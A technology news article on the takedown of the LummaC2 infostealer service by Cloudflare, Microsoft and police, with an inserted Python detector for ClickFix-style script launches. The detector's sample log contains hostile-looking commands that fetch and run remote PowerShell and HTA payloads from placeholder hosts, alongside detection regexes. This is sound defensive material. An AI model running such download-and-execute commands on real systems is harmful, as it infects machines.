IT Brief India - Technology news for CIOs & IT decision-makers
Cloudflare, Microsoft & police disrupt global malware service

Today

Cloudflare, in partnership with Microsoft and international law enforcement, has helped dismantle the infrastructure supporting LummaC2, an information-stealing malware service regarded as a significant threat to users and organisations worldwide.

This collaborative effort targeted key elements of the Lumma Stealer operation, resulting in the seizure, takedown and blocking of malicious domains, as well as disruption to digital marketplaces used by criminals to distribute and monetise stolen data. Cloudflare also banned a number of accounts used in the deployment and configuration of these domains, aiming to weaken the underlying ecosystem relied on by cybercriminals.

Lumma Stealer, also known as LummaC2, operates as a subscription-based service that enables threat actors to access a central administrative panel through which they can acquire customised malware builds and retrieve data stolen from victims. Stolen information includes credentials, cryptocurrency wallets, cookies and various forms of sensitive data, which can subsequently facilitate identity theft, financial fraud and intrusions into both consumer and enterprise environments.

Blake Darché, Head of Cloudforce One at Cloudflare, said: "Lumma goes into your web browser and harvests every single piece of information on your computer that could be used to access either dollars or accounts – with the victim profile being everyone, anywhere at any time. The threat actors behind the malware target hundreds of victims daily, grabbing anything they can get their hands on. This disruption worked to fully set back their operations by days, taking down a significant number of domain names, and ultimately blocking their ability to make money by committing cybercrime. While this effort threw a sizable wrench into the largest global infostealer infrastructure, like any threat actor, those behind Lumma will shift tactics and reemerge to bring their campaign back online."

First observed on Russian-language crime forums in early 2023, Lumma Stealer's operations have increasingly shifted to Telegram, where cybercriminals buy access and share data using cryptocurrency. Bundles of stolen credentials, known as "logs", are indexed and made available through Lumma's own marketplace or resold via other criminal networks.

The spread of Lumma Stealer is primarily achieved through social engineering campaigns. These include deceptive pop-ups — part of a method called ClickFix — which trick users into executing malicious scripts themselves, as well as bundling payloads in cracked versions of legitimate software and distributing them via pay-per-install networks. The malware's developers invest in bypassing detection by antivirus solutions, increasing the risk to affected users and organisations.

Cloudflare's disruption operations involved placing a Turnstile-enabled interstitial warning page on domains associated with Lumma's command and control servers as well as its marketplace. In addition to impeding access, Cloudflare collaborated with leading industry partners, including Microsoft, multiple registry authorities, the FBI, the U.S. Department of Justice, Europol's European Cybercrime Center, and Japan's Cybercrime Control Center. This was intended to ensure that the criminals could not simply migrate their infrastructure or regain control via alternative registrars.

The tactics used by Lumma's operators relied on abusing infrastructure belonging to providers like Cloudflare, often to obscure the origin IP addresses of servers used to store stolen data. Cloudflare's Trust and Safety team repeatedly suspended malicious accounts and flagged illicit domains, escalating countermeasures after the malware was observed bypassing its initial warning pages.

Mitigation advice for users and organisations includes restricting the execution of unknown scripts, limiting the saving of passwords in browsers, and employing reputable endpoint protection tools capable of detecting credential theft. Regular software updates, DNS filtering and user education around the risks of malvertising and fake software installers are also highlighted as part of a comprehensive defence strategy.
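The ClickFix lure described above ends with the victim launching a script host from their own desktop session, which is exactly what the "restrict execution of unknown scripts" advice is meant to catch. The following is an added detection example, not code from Cloudflare, Microsoft or the article: it scores process-creation events in a constructed key="value" log format (not any vendor's real schema) and flags script interpreters launched from a browser or Explorer with traits such as a hidden window, an encoded command, an execution-policy bypass or a remote fetch. The host list, parent list and scoring weights are assumptions a defender would tune to their own environment.

```python
import re
from dataclasses import dataclass

# Script hosts a ClickFix-style lure typically asks the victim to run (assumed list)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe", "cmd.exe"}
# Parents that rarely spawn a script host on a managed desktop (assumed list)
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

# Command-line traits that raise the score; each is a heuristic, not proof of compromise
INDICATORS = [
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("encoded_command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("bypass_policy", re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I)),
    ("remote_fetch", re.compile(r"https?://|downloadstring|invoke-webrequest|\biwr\b|\birm\b", re.I)),
]

# Constructed log format: space-separated key="value" pairs, one event per line
LINE_RE = re.compile(r'(\w+)="([^"]*)"')


@dataclass
class Finding:
    user: str
    image: str
    parent: str
    score: int
    reasons: tuple


def parse_line(line):
    """Return the event's fields as a dict, or None if it is not a process-creation event."""
    fields = dict(LINE_RE.findall(line))
    return fields if fields.get("event") == "process_create" else None


def basename(path):
    """Strip a Windows path down to the executable name, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def analyse(line, threshold=3):
    """Score one event; return a Finding when the score reaches the threshold, else None."""
    ev = parse_line(line)
    if ev is None:
        return None
    image, parent = basename(ev.get("image", "")), basename(ev.get("parent", ""))
    if image not in SCRIPT_HOSTS:
        return None
    score, reasons = 0, []
    # A script host started by a browser or Explorer is the core ClickFix signal (weight 2)
    if parent in INTERACTIVE_PARENTS:
        score += 2
        reasons.append(f"spawned_by_{parent}")
    for name, rx in INDICATORS:
        if rx.search(ev.get("cmdline", "")):
            score += 1
            reasons.append(name)
    if score < threshold:
        return None
    return Finding(ev.get("user", "?"), image, parent, score, tuple(reasons))


def scan(lines, threshold=3):
    """Run analyse() over a sequence of log lines and keep only the findings."""
    return [f for f in (analyse(line, threshold) for line in lines) if f is not None]


# Constructed sample events: two benign, two ClickFix-like, one admin task with a low score
SAMPLE_LOG = [
    r'event="process_create" user="alice" parent="C:\Windows\explorer.exe" image="C:\Windows\notepad.exe" cmdline="notepad.exe"',
    r'event="process_create" user="admin" parent="C:\Windows\System32\cmd.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmdline="powershell.exe -File C:\scripts\backup.ps1"',
    r'event="process_create" user="alice" parent="C:\Windows\explorer.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmdline="powershell.exe -w hidden -ep bypass -c iwr http://example.invalid/update.ps1"',
    r'event="process_create" user="bob" parent="C:\Program Files\Microsoft\Edge\Application\msedge.exe" image="C:\Windows\System32\mshta.exe" cmdline="mshta.exe https://example.invalid/update.hta"',
    r'event="process_create" user="SYSTEM" parent="C:\Windows\System32\svchost.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmdline="powershell.exe -NoProfile -EncodedCommand AAAAAAAAAAAAAAAAAAAAAAAA"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"{finding.user}: {finding.parent} -> {finding.image} score={finding.score} {finding.reasons}")
```

The weight on the parent process is deliberately higher than on any single command-line flag, because a hidden window or an encoded command on its own is routine for scheduled tasks and management agents (the last sample line), whereas Explorer or a browser launching PowerShell is what a user pasting a ClickFix command into a run prompt actually produces. Raising the threshold trades recall for fewer alerts.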

By disrupting Lumma Stealer's infrastructure and limiting access to its command and control services, the operation has imposed significant operational and financial constraints on both the core operators and the wider criminal clientele. The disruption aims to undermine the infostealer-as-a-service model that has contributed to increased instances of cyber-enabled fraud, enterprise security breaches, and ransomware incidents.
